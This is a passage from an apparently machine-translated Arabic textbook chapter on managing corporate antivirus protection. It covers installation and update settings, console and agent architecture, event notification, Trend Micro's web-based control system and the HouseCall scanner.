• لا تحتوي على نسخة مثبتة من برنامج مكافحة الفيروسات ؛
• تحتوي على نسخة قديمة من برنامج مكافحة الفيروسات ؛
• إما أنها لا تحتوي على نسخة مثبتة من برنامج مكافحة الفيروسات ، أو تحتوي على نسخة قديمة من برنامج مكافحة الفيروسات

من الممكن إجراء إعادة تحديث إجباري لنسخ برامج مكافحة الفيروسات التي تم تحديثها مسبقًا.

خيارات تكوين مكافحة الفيروسات

باستخدام هذه الخيارات ، يمكنك تحديد ملف يحتوي على قالب إعدادات التكوين لتطبيق مكافحة الفيروسات. يمكنك أيضًا تحديد اسم لكل نموذج.

تذكر أن القوالب تسمح لك بحفظ مجموعات مختلفة من إعدادات برنامج مكافحة الفيروسات لمحطات عمل مختلفة أو مجموعات مستخدمين أو مجالات.

موقع دليل التثبيت المركزي الرئيسي

تحدد مجموعة الإعدادات هذه الموقع الفعلي للدليل الرئيسي للتثبيت المركزي لتطبيقات مكافحة الفيروسات. يمكن نسخ هذا الدليل إلى أدلة أخرى موجودة ، على سبيل المثال ، على أقراص الخوادم البعيدة لفروع الشركة.

موقع دليل تثبيت برامج مكافحة الفيروسات على محطات العمل

يمكن للمسؤول تحديد المسار إلى دليل محطة العمل حيث يجب تثبيت برنامج مكافحة الفيروسات.

يمكن تحديد الدليل الافتراضي أو الدليل الخاص بهذا التكوين.

حساب لتثبيت وتحديث برامج مكافحة الفيروسات

تتيح لك مجموعة المعلمات هذه تحديد حساب (معرف وكلمة مرور ومجال) ستستخدمه محطة العمل لتحديث برنامج مكافحة الفيروسات وقاعدة بيانات مكافحة الفيروسات. هذا الحساب غير مطلوب أن يكون لديه امتيازات إدارية.

خيارات لتغيير دليل التثبيت المركزي الحالي

تتيح لك هذه الخيارات إنشاء إما دليل تثبيت مركزي مشترك مسجل يحتوي على توزيعات متعددة لبرامج مكافحة فيروسات مختلفة في وقت واحد ، أو أدلة عشوائية منفصلة لكل برنامج مكافحة فيروسات.

خيارات النسخ المتماثل لدليل التثبيت المركزي

تسمح لك هذه الخيارات بتحديد الدلائل المتضمنة في النسخ المتماثل ، وما إذا كان يجب حذف ملفات التوزيع القديمة قبل النسخ المتماثل.

يمكنك أيضًا تعيين وضع النسخ المتماثل الجزئي ، حيث يتم نسخ ملفات قاعدة بيانات مكافحة الفيروسات وأهم ملفات البرامج فقط. هذا الوضع مناسب بشكل خاص في الحالات التي يتم فيها إجراء النسخ المتماثل عبر قنوات الاتصال البطيئة (على سبيل المثال ، المودم).

خيارات فحص الشبكة لاكتشاف أجهزة الكمبيوتر الجديدة

يتم إجراء عمليات الفحص هذه لتثبيت برامج مكافحة الفيروسات تلقائيًا على أجهزة الكمبيوتر الجديدة.

تسمح لك هذه الإعدادات بتحديد مجموعات من أجهزة الكمبيوتر والمجالات التي سيتم فحصها.

خيارات التقرير

تتيح لك هذه الخيارات تحديد اسم الملف الذي سيتم حفظ التقرير فيه ، وكذلك الأمر الذي سيتم تنفيذه بعد إنشاء التقرير. يمكن لهذا الأمر ، على سبيل المثال ، تحميل التقرير الذي تم إنشاؤه في Microsoft Excel.

3. معلمات برنامج التحكم والإدارة

تتكون أنظمة المراقبة والتحكم الكلاسيكية من برنامج تحكم يعمل على محطة عمل المسؤول وبرامج الوكيل التي تعمل على محطات العمل وخوادم الشبكة.

تؤثر معلمات برنامج التحكم والإدارة على أنماط تشغيل البرنامج نفسه والوكلاء. من خلال تغيير هذه الإعدادات ، يمكن للمسؤول تحديد بروتوكول الشبكة المطلوب الذي تستخدمه وحدة التحكم للتواصل مع الوكلاء ، وكذلك تكوين معلمات بروتوكول الشبكة المحدد.

تكوين برنامج المراقبة والتحكم

تسمح لك هذه الخيارات بضبط:

• وضع عرض قائمة بجميع أجهزة الكمبيوتر المتصلة بالشبكة (آليًا أو بناءً على طلب صريح) ؛
• عدد سلاسل التنفيذ (الخيوط) لتحديث المعلومات حول حالة الشبكة ؛
• عدد محاولات استخراج البيانات من أجهزة الكمبيوتر البعيدة (مطلوب في حالة التشغيل غير المستقر لقنوات الاتصال) ؛
• موقع ملف السجل المركزي الذي يخزن الأحداث المتعلقة بتشغيل الحماية ضد الفيروسات على جميع أجهزة الكمبيوتر في شبكة الشركة ؛
• إعدادات حسابات المسؤول المستخدمة لإدارة الحماية من الفيروسات (المعرف وكلمة المرور والمجال وما إلى ذلك).

تكوين وكلاء

يتم إطلاق برامج الوكيل على محطات العمل والتفاعل مع برنامج التحكم. تم تكوين الإعدادات التالية للوكلاء:

• بروتوكول الشبكة المستخدم للتفاعل مع برنامج التحكم (TCP / IP ، IPX / SPX ، NetBIOS عبر TCP ، NetBIOS عبر IPX ، الأنابيب المسماة ، إلخ) ؛
• نقطة النهاية (نقطة النهاية) ؛
• رقم المنفذ

4. مبادئ الهندسة المعمارية والتشغيل لأنظمة الحماية من الفيروسات للشركات

بعد النظر في الغرض من أنظمة التحكم والمراقبة للحماية من الفيروسات ووظائفها ، دعنا ننتقل إلى مراجعة الحلول المعمارية المستخدمة في مكافحة الفيروسات الحديثة للشركات. هذه هي هياكل خادم العميل الكلاسيكية ، بالإضافة إلى البنى متعددة المستويات التي تتضمن استخدام تقنيات الويب.

أنظمة خادم العميل

عند استخدام بنية خادم العميل ، فإن أساس نظام الإدارة والتحكم هو خادم مضاد للفيروسات مثبت على أحد خوادم شبكة الشركة. إنه يتفاعل ، من ناحية ، مع برامج الوكيل المثبتة مع برامج مكافحة الفيروسات على محطات عمل الشبكة ، ومن ناحية أخرى ، مع وحدة التحكم الإدارية لمسؤول الحماية من الفيروسات (الشكل 4-1).

أرز. 4-1. التفاعل بين وحدة تحكم المسؤول والوكلاء وخادم مكافحة الفيروسات

يقوم خادم مكافحة الفيروسات بإدارة وتنسيق الإجراءات. على وجه الخصوص ، يقوم بتخزين سجل عام للأحداث المتعلقة بالحماية من الفيروسات والتي تحدث على جميع أجهزة الكمبيوتر في الشبكة ، بالإضافة إلى قائمة وجدول المهام. يكون خادم مكافحة الفيروسات مسؤولاً عن تلقي الرسائل من الوكلاء وإرسالها إلى مسؤول الحماية من الفيروسات حول حدوث أحداث معينة في الشبكة ، ويقوم بإجراء فحوصات دورية لتكوين الشبكة من أجل اكتشاف محطات العمل أو محطات العمل الجديدة باستخدام مضاد متغير. تكوين الفيروسات ، إلخ.

بالإضافة إلى الوكلاء ، يتم تثبيت برنامج مكافحة فيروسات على كل محطة عمل وخادم شبكة شركة يقوم بفحص الملفات وفحص الملفات عند فتحها (وظائف الماسح الضوئي ومراقبة مكافحة الفيروسات). يتم إرسال نتائج عملية مكافحة الفيروسات من خلال وكلاء إلى خادم مكافحة الفيروسات ، الذي يقوم بتحليلها وتسجيلها في سجل الأحداث العام.

توفر وحدة التحكم الإدارية الخاصة بالمسؤول القدرة على إدارة نظام الحماية ضد الفيروسات بالكامل ومراقبة تشغيله. يتفاعل من خلال وكلاء مع خادم مكافحة الفيروسات ، وكذلك مع برامج مكافحة الفيروسات المثبتة على جميع أجهزة الكمبيوتر في الشبكة.

يمكن أن تكون وحدة التحكم في الإدارة أحد تطبيقات Microsoft Windows القياسية بواجهة نافذة ، أو برنامج صغير (أداة إضافية) لوحدة تحكم إدارة لوحة التحكم لنظام التشغيل Microsoft Windows. يتم تنفيذ النهج الأول ، على سبيل المثال ، في نظام إدارة مكافحة الفيروسات Sophos ، والثاني - في نظام إدارة Norton AntiVirus.

تتيح لك واجهة المستخدم لوحدة التحكم الإدارية عرض الهيكل الشجري لشبكة الشركة ، والحصول ، إذا لزم الأمر ، على أجهزة كمبيوتر فردية لمجموعات أو مجالات مستخدمين معينة (الشكل 4-2).

أرز. 4-2. وحدة تحكم الإدارة لمسؤول الحماية من الفيروسات

نظرًا لأن شبكة الشركة يمكن أن تكون واسعة جدًا ، مع وجود آلاف أجهزة الكمبيوتر في مئات المجالات ، يجب أن توفر وحدة التحكم ليس فقط عرض شجرة الشبكة ولكن أيضًا وسيلة للبحث المباشر عن محطات العمل بالاسم أو مجموعة عمل المستخدم أو المجال.

بالنسبة لبقية عناصر واجهة المستخدم ، يتم استخدام مربعات الحوار العادية مع عناصر تحكم قياسية أو مصممة خصيصًا هنا - الأزرار والقوائم ومربعات الاختيار وحقول إدخال النص وما إلى ذلك.

عملية التثبيت الأولية

يقوم مسؤول الحماية من الفيروسات بتشغيل برنامج التثبيت لوحدة التحكم عن بعد والمراقبة ، حيث يتم تنفيذ جميع العمليات الأخرى المتعلقة بتثبيت وتحديث وتشغيل نظام الحماية من الفيروسات. على وجه الخصوص ، يتم تثبيت خادم مكافحة الفيروسات على أحد خوادم شبكة الشركة ، والذي يؤدي وظائف التنسيق والتحكم.

في الشبكات الصغيرة ، يمكن للمسؤول استخدام وحدة التحكم لإنشاء دليل تثبيت مركزي لمكافحة الفيروسات على خادم الشبكة المحلية ، ثم بدء (أو إعداد مهمة للتشغيل المتأخر) عملية تثبيت مكافحة الفيروسات على جميع محطات عمل الشبكة والخوادم.

في شبكات الشركة الكبيرة ذات المكاتب الفرعية البعيدة ، يستخدم المسؤول وحدة التحكم لإنشاء عدة أدلة تثبيت مركزية (على سبيل المثال ، دليل واحد لكل شبكة بعيدة). بعد ذلك ، يقوم المسؤول بإعداد المهام لتثبيت برامج مكافحة الفيروسات على جميع محطات عمل الشبكة. يتم إجراء التثبيت في كل فرع بعيد من دليل التثبيت المركزي الخاص به ، مما يقلل من حركة مرور الشبكة بين الفروع. لتقليل وقت التثبيت ، يتم تثبيت برنامج مكافحة الفيروسات على جميع محطات العمل في وقت واحد.

تحديث قاعدة بيانات مكافحة الفيروسات والفيروسات

يتم تنفيذ هذه العملية بواسطة مسؤول الحماية من الفيروسات من محطة العمل الخاصة به باستخدام وحدة التحكم والإدارة.

إذا تم إنشاء أدلة تثبيت مركزية متعددة ، يقوم المسؤول بتكوين النسخ المتماثل لها. إذا كان من الضروري تحديث وحدات برنامج مكافحة الفيروسات أو قاعدة بيانات مكافحة الفيروسات ، يقوم المسؤول بتحديث محتويات دليل واحد فقط ، وهو الدليل الرئيسي للتثبيت المركزي. يتم تحديث محتويات الدلائل المنسوخة تلقائيًا وفقًا لجدول زمني محدد مسبقًا.

لاحظ أنه إذا كانت شبكة الشركة متصلة بالإنترنت ، فيمكن تحديث محتويات الدليل الرئيسي للتثبيت المركزي تلقائيًا من موقع شركة مكافحة الفيروسات وفقًا لجدول زمني يحدده المسؤول. إذا لم يتم توفير مثل هذا الاتصال ، يجب على المسؤول تحديث الدليل الرئيسي للتثبيت المركزي يدويًا.

إدارة تشغيل برامج مكافحة الفيروسات

باستخدام وحدة التحكم المركزية في الإدارة والتحكم ، يمكن لمسؤول الحماية من الفيروسات تكوين أوضاع تشغيل مكافحة الفيروسات المثبتة على محطات العمل والخوادم من محطة العمل الخاصة به عن بُعد ، وكذلك تحديد أوضاع تشغيل خدمات خدمة نظام الحماية من الفيروسات.

باستخدام الحسابات المحددة مسبقًا في واحد أو أكثر من مجالات الشركة ، يمكن لوحدة التحكم الاتصال بوكيل يعمل على جميع أجهزة الكمبيوتر على الشبكة. باستخدام واجهة النافذة القياسية ، يمكن للمسؤول تغيير أي إعدادات لمكافحة الفيروسات المثبتة على أجهزة كمبيوتر محددة ، أو لمجموعات مستخدمين محددة أو لمجالات محددة. يمكن إجراء التغييرات على المعلمات على الفور أو تقديمها كمهمة تبدأ في وقت محدد.

بالإضافة إلى ذلك ، يمكن للمسؤول تحديد جدول زمني لفحوصات مكافحة الفيروسات التي يتم إجراؤها عن طريق مسح أدلة محطات العمل والخوادم.

جمع وعرض المعلومات حول تشغيل الحماية من الفيروسات

يضمن نظام التحكم عن بعد والمراقبة جمع وتسجيل وعرض المعلومات حول تشغيل الحماية من الفيروسات. وحدة الخادم لنظام الحماية من الفيروسات المثبتة على أحد خوادم شبكة الشركة (يتم تحديد هذا الخادم من قبل المسؤول) هي المسؤولة عن التجميع المركزي للمعلومات.

تصبح جميع المعلومات التي تم جمعها متاحة من خلال وحدة التحكم في برنامج التحكم في محطة العمل الخاصة بمسؤول الحماية من الفيروسات.

على التين. 4-3 لقد أظهرنا عملية نقل المعلومات من السجلات المحلية لبرامج مكافحة الفيروسات المثبتة على محطات العمل وخوادم الشبكة إلى السجل العام الموجود على خادم مكافحة الفيروسات. كما يوضح أيضًا أن مسؤول الحماية من الفيروسات يمكنه عرض السجل العام من محطة العمل الخاصة به باستخدام وحدة التحكم.

أرز. 4-3. وحدة تحكم الإدارة لمسؤول الحماية من الفيروسات

المعلومات التالية قابلة للتجميع والتسجيل:

• وقت وتاريخ تثبيت / تحديث وحدات برنامج مكافحة الفيروسات ، مع الإشارة إلى إصدار هذه الوحدات ؛
• وقت وتاريخ تحديث قاعدة بيانات مكافحة الفيروسات ، مع الإشارة إلى نسختها ؛
• معلومات حول إصدار نظام التشغيل المثبت على محطات العمل وخوادم الشبكة ، ونوع المعالج ، وموقع أدلة نظام التشغيل ، وما إلى ذلك ؛
• معلومات حول إصدار مكافحة الفيروسات المثبت على محطات العمل وخوادم الشبكة ؛
• معلومات حول الحسابات المستخدمة في محطة العمل للوصول إلى دليل التثبيت المركزي من أجل تثبيت أو تحديث قاعدة بيانات مكافحة الفيروسات ومكافحة الفيروسات ؛
• معلومات حول موقع دليل التثبيت المركزي المستخدم لتثبيت أو تحديث قاعدة بيانات مكافحة الفيروسات ومكافحة الفيروسات ؛
• معلومات حول المسار الكامل لملفات السجل المحلية الموجودة على محطات العمل وخوادم الشبكة ومحتوياتها ؛
• معلومات حول الحسابات التي تستخدمها وحدة التحكم في الإدارة للوصول إلى موارد محطات العمل وخوادم الشبكة عند تثبيت وتحديث قاعدة بيانات مكافحة الفيروسات ومكافحة الفيروسات ، وكذلك عند الحصول على معلومات حول تشغيل برنامج مكافحة الفيروسات ؛
• أوضاع تكوين وتشغيل مكافحة الفيروسات (استخدام الأساليب التجريبية ، وقائمة أنواع الملفات الممسوحة ضوئيًا ، والإجراءات التي يجب اتخاذها عند اكتشاف الفيروسات ، وما إلى ذلك) ؛
• المعلومات المتعلقة بتشغيل برنامج مكافحة الفيروسات ، مثل اسم الفيروس المكتشف ، وتاريخ اكتشافه ، والإجراءات المتخذة ، ونتيجة العلاج ، وما إلى ذلك.

تتم كتابة المعلومات المستلمة في سجل النظام الخاص بالخادم المسؤول عن التجميع المركزي للمعلومات حول تشغيل نظام الحماية من الفيروسات.

باستخدام وحدة التحكم الإدارية ، يمكن للمسؤول الحصول على مجموعة متنوعة من التقارير المجدولة ، وتحويلها ، إذا لزم الأمر ، إلى تنسيق Microsoft Excel. يمكن أن تكون هذه ، على سبيل المثال ، تقارير مثل:

• تقارير حول تثبيت أو تحديث قواعد بيانات مكافحة الفيروسات والفيروسات ؛
• تقارير عن اكتشاف الفيروسات في محطات عمل مختارة ، ومحطات عمل مجموعات المستخدمين والمجالات ؛
• التقارير التي تسمح لك بتتبع وقت واتجاه انتشار فيروسات معينة ؛
• تقارير عن استخدام الحسابات المصممة لإدارة تشغيل نظام مكافحة الفيروسات ؛
• تقارير عن التغييرات في الإعدادات وأنماط التشغيل لنظام مكافحة الفيروسات

إعلام الإشارة

عندما يعثر برنامج مكافحة الفيروسات على ملف مصاب على محطة عمل المستخدم أثناء فحص يتم إجراؤه كجزء من مهمة أو يتم بدؤه بواسطة مراقب مكافحة الفيروسات ، فإنه يقوم بإعلام المستخدم (عن طريق عرض رسالة على شاشة محطة العمل الخاصة به) و خادم مكافحة الفيروسات.

بعد ذلك ، يقوم خادم مكافحة الفيروسات بإعلام مسؤول الحماية والأشخاص الآخرين بحدوث الحدث وفقًا للإعدادات المحددة أثناء تثبيت نظام الحماية من الفيروسات. في هذه الحالة ، يرسل خادم مكافحة الفيروسات رسالة عبر شبكة الشركة و (إذا حددها المسؤول) عبر شبكة الترحيل أو عبر البريد الإلكتروني أو عبر شبكة الرسائل القصيرة (الشكل 4-4).

بالإضافة إلى ذلك ، تتم كتابة رسالة حول حدوث حدث في السجل الرئيسي الموجود على خادم مكافحة الفيروسات.

بمساعدة وحدة التحكم الإدارية ، يمكن لمسؤول الحماية من الفيروسات تحديد قائمة الأحداث ، والتي يجب إبلاغ المستخدمين والمسؤولين بحدوثها بشكل عاجل. يمكن أن تكون هذه ، على سبيل المثال ، أحداثًا مثل:

• الكشف عن الفيروسات
• عدم القدرة على تحديث وحدات برامج مكافحة الفيروسات أو قواعد بيانات مكافحة الفيروسات بنجاح ؛
• أخطاء في تشغيل برامج الحماية من الفيروسات (خاصة تلك التي يمكن أن تؤدي إلى إيقاف طارئ للحماية من الفيروسات) ؛
• استحالة التسجيل المحلي للأحداث بسبب تجاوز سجل الأحداث المحلي أو لأسباب أخرى ؛
• التغييرات في تكوينات وأنماط تشغيل برامج مكافحة الفيروسات التي من المحتمل أن تقلل من مستوى الحماية أو موثوقيتها.

قد يتم إرسال رسالة حول حدوث مثل هذه الأحداث ، اعتمادًا على الإعدادات التي أجراها المسؤول

• المستخدم الذي وقع حدث على محطة العمل (على سبيل المثال ، تم اكتشاف فيروس) ؛
• واحد أو أكثر من المسؤولين المسؤولين عن تشغيل الشبكة أو تشغيل الحماية ضد الفيروسات ؛
• رئيس الشركة أو أي أشخاص آخرين ، تم تحديد قائمةهم مسبقًا من قبل المسؤول.

أرز. 4-4. إرسال رسالة حول إصابة بالفيروس إلى محطة عمل

يتم إرسال الرسالة من خلال وسائل البث القياسية لنظام التشغيل (يظهر نص الرسالة المرسلة بهذه الطريقة على شاشة المستلم في مربع حوار صغير) ومن خلال الوسائل الإضافية المدرجة أدناه:

• عبر البريد الإلكتروني باستخدام بروتوكول SMTP ؛
• عبر خدمة البريد MHS (على شبكات NetWare) ؛
• إلى جهاز استدعاء أبجدي رقمي واحد أو أكثر باستخدام بروتوكول الإدخال الأبجدي الرقمي (IXO / TAP) أو جهاز الاستدعاء الرقمي ؛
• من خلال نظام الرسائل القصيرة SMS.

يسمح لك برنامج وحدة التحكم والقيادة بتعيين رسائل مختلفة للأحداث. وبالتالي ، يمكن للمسؤول تحديد نصوص الرسالة بنفسه.

لاحظ أنه من أجل إرسال رسائل إلى جهاز نداء أو إرسال رسائل SMS ، يتواصل نظام مكافحة الفيروسات عبر مودم مع الخدمة المقابلة التي تعمل في الوضع التلقائي. لا تتوفر هذه الخدمات في كل مكان ، لذا فإن إرسال الرسائل عبر البريد الإلكتروني يعد أكثر تنوعًا من إرسال الرسائل إلى جهاز نداء أو هاتف محمول عبر الرسائل القصيرة.

المودم مطلوب لإرسال الرسائل إلى خدمات الترحيل أو خدمات الرسائل النصية القصيرة التلقائية. يمكن توصيل هذا المودم إما بخادم يلعب دور مركز لجمع ومعالجة المعلومات حول تشغيل الحماية من الفيروسات ، أو بأي كمبيوتر آخر على شبكة الشركة. عند تكوين نظام المراسلة ، يجب أن يحدد المسؤول الكمبيوتر الذي يتصل به المودم.

يمكنك استخدام خادم بريد الشركة أو الخادم الذي يستضيفه مزود خدمة الإنترنت لإرسال الرسائل عبر بريد SMTP الإلكتروني. إذا كانت الشبكة المحلية متصلة بالإنترنت باستخدام مودم ، فسيقوم نظام إدارة ومكافحة الفيروسات بإنشاء اتصال من تلقاء نفسه دون تدخل المشغل لإرسال الرسائل.

هناك أيضًا العديد من البوابات على الإنترنت التي تسمح بإعادة توجيه رسائل البريد الإلكتروني إلى جهاز نداء أو هاتف محمول (كرسائل SMS). ومع ذلك ، تجدر الإشارة إلى أن جميع هذه البوابات الروسية تعمل في وضع تجريبي ، وبالتالي فإن تشغيلها الموثوق به غير مضمون.

أما بالنسبة للوقت اللازم لمرور رسالة بريد إلكتروني عبر البوابة وشبكة الرسائل القصيرة إلى الهاتف المحمول ، فقد أظهرت الاختبارات العملية أنه في موسكو يتراوح من بضع ثوانٍ إلى عدة ساعات.

أنظمة متعددة المستويات بواجهة ويب

تتضمن بنية الأنظمة متعددة المستويات مع واجهة الويب استخدام خادم الويب باعتباره جوهر النظام. تتمثل مهمة هذا المركز ، من ناحية ، في تنظيم تفاعل تفاعلي مع المستخدم ، ومن ناحية أخرى ، مع وحدات البرامج لنظام معين.

لاحظ أن تقنيات الويب تُستخدم اليوم على نطاق واسع لحل مثل هذه المهام الإدارية مثل مراقبة وتشخيص معدات خادم الشركة وإدارة خوادم البريد الإلكتروني والأجهزة والأنظمة الأخرى المتصلة بالإنترنت أو الشبكات الداخلية للشركات.

باستخدام متصفح مشترك ، يمكن لمسؤول النظام أو فريق الهندسة ، على سبيل المثال ، الحصول على معلومات تشخيصية شاملة حول تشغيل أجهزة خادم Compaq. يتضمن ذلك معلومات مثل سجلات الأخطاء ، والرسائل حول الأعطال المحتملة في الأجهزة ، ودرجات حرارة وحدة المعالجة المركزية ، ودرجات الحرارة داخل العلبة ، وإمدادات الطاقة ، وسرعات المروحة ، وما إلى ذلك.

تتمثل مزايا هذا النهج في توحيد أساليب إدارة أنظمة الشبكة المختلفة ، فضلاً عن عدم الحاجة إلى تثبيت أي برامج تحكم أو وحدات تحكم على محطة عمل المسؤول. بالإضافة إلى ذلك ، يمكن إجراء الإدارة من أي كمبيوتر شبكة ، وإذا كانت الشبكة متصلة بالإنترنت ، فمن أي مكان في العالم يوجد به اتصال بالإنترنت وجهاز كمبيوتر به متصفح.

تُستخدم بروتوكولات SSH أو غيرها من الوسائل المماثلة (على سبيل المثال ، التعديلات الآمنة الأصلية لبروتوكول HTTP) لحماية معلومات التحكم عند إرسالها عبر الإنترنت أو شبكة الإنترانت الخاصة بالشركة.

اتجاه هندسة نظام التحكم في الفيروسات

ضع في اعتبارك بنية نظام Trend Virus Control System ، المبني على أساس تقنيات الويب. يتيح لك هذا النظام الإدارة والتحكم الكامل في تشغيل نظام الحماية من الفيروسات للشركات من محطة عمل واحدة من خلال متصفح ، حتى إذا كانت أجزاء الشبكة الفردية موجودة دول مختلفةأو في قارات مختلفة.

يتم تثبيت خادم ويب ، عادةً Microsoft Internet Information Server الإصدار 4.0 أو 5.0 ، على أحد خوادم شبكة الشركة. هذا الخادم هو جزء من نظام التشغيل Microsoft Windows 2000 Server ويمكن تثبيته على نظام التشغيل Microsoft Window NT الإصدار 4.0 من حزمة خيارات Microsoft المجانية لنظام التشغيل Windows NT.

يتفاعل تطبيق الويب الخاص بالخادم Trend VCS Server الذي يعمل على خادم الويب هذا مع وحدة التحكم والمراقبة لنظام مكافحة الفيروسات ، وكذلك مع وكلاء البرامج المثبتين على جميع أجهزة كمبيوتر الشبكة التي لا تحتوي على واجهة مستخدم خاصة بها.

يتم التفاعل باستخدام بروتوكول HTTP الآمن الذي طورته Trend Micro. بالإضافة إلى ذلك ، يتم استخدام الحماية بكلمة مرور لتقييد الوصول إلى خادم IIS وخادم Trend VCS.

على التين. 4-5 أظهرنا مخطط كتلة لنظام حماية ضد الفيروسات بواجهة ويب.

أرز. 4-5. نظام مضاد للفيروسات بواجهة ويب

تشبه هذه الدائرة الدائرة الموضحة في الشكل. 4-1 ، ومع ذلك ، يدير مسؤول الحماية من الفيروسات عملياته من خلال المتصفح ، وليس من خلال تطبيق وحدة التحكم.

تم تثبيت مضاد فيروسات (PC-cillin ، Server Protect ، InterScan VirusWall ، ScanMail ، إلخ) على محطات العمل. تتم إدارة برنامج مكافحة الفيروسات هذا بواسطة خادم مكافحة الفيروسات من خلال وكيل.

يتم تثبيت خادم ويب Microsoft Internet Information Server على الكمبيوتر الذي يعمل كخادم مكافحة الفيروسات. يقوم تطبيق ويب خاص يعمل على هذا الخادم بإدارة خادم مكافحة الفيروسات. كما يوفر للمسؤول واجهة مستخدم لإدارة نظام الحماية من الفيروسات.

بناءً على طلب مسؤول الحماية من الفيروسات ، الذي يتم إجراؤه من خلال المتصفح ، يبدأ هذا التطبيق في تنفيذ عمليات مثل:

• إنشاء أدلة التثبيت المركزية ؛
• إعداد وتشغيل المهام لنسخ أدلة التثبيت المركزي ؛
• إعداد وإطلاق مهام تركيب وحدات برامج مكافحة الفيروسات وقواعد بيانات مكافحة الفيروسات ؛
• تكوين أوضاع تشغيل برامج مكافحة الفيروسات المثبتة على محطات العمل وخوادم شبكة الشركة ؛
• عرض أنواع مختلفة من السجلات والتقارير التي تعكس عمل نظام الحماية من الفيروسات ، وكذلك تلبية طلبات الحصول على معلومات حول هذه التقارير ؛
• التحكم في إصدار أنظمة التشغيل وبرامج مكافحة الفيروسات وقواعد البيانات المضادة للفيروسات المثبتة على جميع أجهزة كمبيوتر الشبكة.

وبالتالي ، لإدارة جميع أدوات مكافحة الفيروسات المثبتة في أي مكان على شبكة الشركة ، يمكن للمسؤول استخدام متصفح.

يمكن تشغيل هذا المتصفح على أي جهاز كمبيوتر على الشبكة ، لذلك ليست هناك حاجة لتثبيت أي تطبيقات أو تطبيقات إدارية. يعمل هذا على تبسيط مهمة إدارة تشغيل أدوات مكافحة الفيروسات ، حيث يمكن إجراؤها ليس فقط من محطة عمل المسؤول ، ولكن أيضًا من أي محطة عمل شبكة أخرى. كونه ، على سبيل المثال ، في رحلة عمل في أحد فروع الشركة ، يكون المسؤول قادرًا على التحكم الكامل في تشغيل نظام الحماية من الفيروسات ، كما لو كان جالسًا في مكتبه في المكتب المركزي.

لكي تكون مستقلاً عن منصات الكمبيوتر قدر الإمكان ، تتم كتابة Trend VCS Server وتطبيق العميل بلغة برمجة Java واللغات الأخرى المستخدمة لتطوير تطبيقات الويب.

بالنسبة للإخطارات المتعلقة بحدوث الأحداث في نظام الحماية من الفيروسات الخاص بالشركات ، يتم إرسال هذه الإشعارات عن طريق برامج الوكيل إلى خادم Trend VCS وإرسالها عن طريق البريد الإلكتروني وشبكات الترحيل وأنظمة الرسائل القصيرة وما إلى ذلك.

نظام HouseCall

بالإضافة إلى الحماية الكلاسيكية من الفيروسات باستخدام برامج مكافحة الفيروسات التي تعمل على محطات العمل ، تقدم Trend Micro تقنية لفحص الملفات بحثًا عن الفيروسات باستخدام عنصر تحكم ActiveX مصمم خصيصًا لمكافحة الفيروسات.

يوجد عنصر تحكم ActiveX هذا على خادم ويب الشركة ويمكن الوصول إليه من خلال مستعرض. عندما يريد المستخدم بدء فحص مضاد للفيروسات للملفات أو الدلائل الموجودة على محطة العمل الخاصة به ، فإنه يفتح الصفحة المقابلة لخادم ويب الشركة باستخدام مستعرض. يقوم هذا تلقائيًا بتحميل عنصر تحكم ActiveX المضاد للفيروسات في ذاكرة محطة عمل المستخدم.

بمجرد اكتمال التنزيل ، يمكن للمستخدم التفاعل مع عنصر تحكم ActiveX في مكافحة الفيروسات من خلال نافذة متصفح ، بواجهة مستخدم مماثلة لواجهة برنامج مكافحة فيروسات تقليدي (الشكل 4-6).

استخدام نظام HouseCall بسيط للغاية. باستخدام قائمة الدلائل الشبيهة بالشجرة ، تحتاج إلى تحديد الدلائل والملفات التي سيتم فحصها عن طريق تحديد مربعات الاختيار المناسبة. بعد ذلك ، انقر فوق الزر SCAN ، وبعد ذلك ستبدأ عملية المسح. إذا قمت أيضًا بتحديد مربع التنظيف التلقائي ، فسيحاول البرنامج إزالة جسم الفيروس من الملفات المصابة.

ستظهر نتائج الفحص في نافذة منفصلة. سيُطلب من المستخدم محاولة إزالة جسم الفيروس من الملفات المصابة أو حذف الملفات المصابة.

أرز. 4-6. نظام مكافحة الفيروسات HouseCall

تشمل مزايا هذا الأسلوب عدم الحاجة إلى تثبيت برنامج مضاد للفيروسات على محطة عمل المستخدم. عندما يحتاج المستخدم إلى التحقق من ملف ، يقوم ببساطة بتشغيل متصفح ، وتحميل الصفحة المطلوبة من موقع ويب الشركة فيه ، ويبدأ في المسح.

أما بالنسبة للعيوب ، فإن هذه التقنية لا تعني وجود جهاز مراقبة مضاد للفيروسات يقوم بفحص جميع الملفات في وقت الوصول إليها. لذلك ، في رأينا ، لا يمكن اعتباره إلا عنصرًا إضافيًا.

يختلف نظام HouseCall ، في مبدأ تشغيله ، اختلافًا جوهريًا عن نظام فحص مكافحة الفيروسات الذي تم إنشاؤه على خادم DialogScience. بدلاً من نقل الملفات واحدًا تلو الآخر إلى الخادم وفحصها باستخدام أحد برامج مكافحة الفيروسات ، يقوم نظام HouseCall بتثبيت وحدة مكافحة فيروسات على كمبيوتر المستخدم ، والتي يتم إنشاؤها في شكل عنصر تحكم ActiveX. بمجرد التنزيل من خادم Trend Micro ، يمكن لهذه الوحدة فحص جميع الملفات المخزنة على كمبيوتر المستخدم عند الطلب. لا يتم نقل هذه الملفات عبر الإنترنت ، بل يتم فحصها محليًا ، وبالتالي لا تستغرق العملية الكثير من الوقت.